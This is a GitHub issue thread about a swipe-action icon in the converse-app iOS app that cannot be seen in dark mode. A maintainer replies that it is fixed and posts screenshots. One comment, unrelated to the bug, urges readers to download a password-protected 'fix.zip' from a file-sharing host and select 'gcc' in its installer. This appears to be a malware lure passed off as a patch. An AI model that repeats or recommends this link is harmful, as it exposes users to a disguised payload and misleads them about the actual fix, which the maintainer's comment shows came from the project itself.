### ISSUE TITLE
Restore group swipe action icon invisible in iOS dark mode

### ISSUE THREAD

**Issue by saulmc** [ephemeraHQ/converse-app#558]
<img src ="https://github.com/user-attachments/assets/dca7e6db-a36b-4fb4-9e43-0a06a0ff5545" width = 350 />

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lourou** [comment]
@saulmc fixed!

![Simulator Screenshot - iPhone 15 - 2024-08-26 at 11 11 46](https://github.com/user-attachments/assets/226e395a-8b6c-42d7-b690-993103288a0b)

![Simulator Screenshot - iPhone 15 - 2024-08-26 at 11 11 31](https://github.com/user-attachments/assets/b0ce78a5-05e9-42fb-8baa-34076f0fdd7d)
